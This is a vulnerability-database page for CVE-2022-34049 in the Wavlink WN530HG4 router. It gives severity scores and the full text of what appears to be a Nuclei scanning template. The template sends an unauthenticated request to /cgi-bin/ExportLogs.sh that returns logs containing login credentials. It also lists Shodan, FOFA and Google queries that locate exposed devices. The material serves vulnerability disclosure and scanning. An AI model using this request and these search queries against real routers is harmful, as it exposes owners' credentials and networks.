Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-34049
HistoryJul 21, 2022 - 12:26 p.m.

WAVLINK WN530HG4 - Improper Access Control

2022-07-2112:26:31
ProjectDiscovery
github.com
1

5.3 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

5.5 Medium

AI Score

Confidence

High

0.253 Low

EPSS

Percentile

96.7%

Wavlink WN530HG4 M30HG4.V5030.191116 is susceptible to improper access control. An attacker can download log files and configuration data via Exportlogs.sh and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
id: CVE-2022-34049

info:
  name: WAVLINK WN530HG4 - Improper Access Control
  author: For3stCo1d
  severity: medium
  description: |
    Wavlink WN530HG4 M30HG4.V5030.191116 is susceptible to improper access control. An attacker can download log files and configuration data via Exportlogs.sh and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
  impact: |
    An attacker can exploit this vulnerability to gain unauthorized access to the router's settings, potentially leading to further compromise of the network or device.
  remediation: |
    Apply the latest firmware update provided by the vendor to fix the access control issue.
  reference:
    - https://drive.google.com/file/d/1-eNgq6IS609bq2vB93c_N8jnZrJ2dgNF/view
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34049
    - https://drive.google.com/file/d/1ZeSwqu04OghLQXeG7emU-w-Amgadafqx/view?usp=sharing
    - https://drive.google.com/file/d/1-eNgq6IS609bq2vB93c_N8jnZrJ2dgNF/view?usp=sharing
    - https://nvd.nist.gov/vuln/detail/CVE-2022-34049
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2022-34049
    cwe-id: CWE-552
    epss-score: 0.16814
    epss-percentile: 0.9604
    cpe: cpe:2.3:o:wavlink:wl-wn530hg4_firmware:m30hg4.v5030.191116:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: wavlink
    product: wl-wn530hg4_firmware
    shodan-query:
      - http.title:"Wi-Fi APP Login"
      - http.html:"wn530hg4"
      - http.title:"wi-fi app login"
    fofa-query:
      - body="wn530hg4"
      - title="wi-fi app login"
    google-query: intitle:"wi-fi app login"
  tags: cve,cve2022,wavlink,router,exposure

http:
  - raw:
      - |
        GET /cgi-bin/ExportLogs.sh HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Login'
          - 'Password'
        condition: and

      - type: word
        part: header
        words:
          - filename="sysLogs.txt"

      - type: status
        status:
          - 200
# digest: 490a0046304402203240fae1cc4923ea572bf59c3f8f9afd59dc013d39529765d2b5712931dc7f920220756b8ca4c467f9938d2e4a269204378c339b68dd204b736cd99cb9d655bc3a84:922c64590222798bb761d5b6d8e72950

5.3 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

5.5 Medium

AI Score

Confidence

High

0.253 Low

EPSS

Percentile

96.7%

Related for NUCLEI:CVE-2022-34049